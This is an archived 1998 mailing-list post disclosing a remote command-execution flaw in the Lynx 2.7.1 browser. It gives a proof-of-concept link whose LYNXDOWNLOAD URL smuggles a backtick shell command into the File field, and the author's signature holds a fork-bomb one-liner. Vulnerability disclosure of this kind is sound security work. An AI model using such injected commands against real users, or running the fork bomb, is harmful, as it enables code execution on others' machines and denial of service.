|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Very, very ugly remote lynx 2.7.1 hole
Michal Zalewski (lcamtuf
BOSS.STASZIC.WAW.PL)Tue, 17 Mar 1998 16:27:29 +0100
- Messages sorted by: [ date ][ thread ][ subject ][ author ]
- Next message: Michal Zalewski: "Another day, another race - lynx 2.7.1"
- Previous message: Mark Schaefer: "Ascend Filter Setup"
- Next in thread: Lumpy Lynx: "Re: Very, very ugly remote lynx 2.7.1 hole"
While poking around lynx protocol handling routines, I found this very big, ugly remote hole: <a href="LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test"> CLICK HERE </a> It allows remote execution of any code on viewer's machine. Also, by setting 'Method' field to 0 or more, you may crash lynx, but it isn't so exciting as above URL. Also, it's possible to parse /dev/zero as 'File', also not funny. Greetings, _______________________________________________________________________ Michal Zalewski [tel 9690] | finger 4 PGP [lcamtufboss.staszic.waw.pl] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch] =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
- Next message: Michal Zalewski: "Another day, another race - lynx 2.7.1"
- Previous message: Mark Schaefer: "Ascend Filter Setup"
- Next in thread: Lumpy Lynx: "Re: Very, very ugly remote lynx 2.7.1 hole"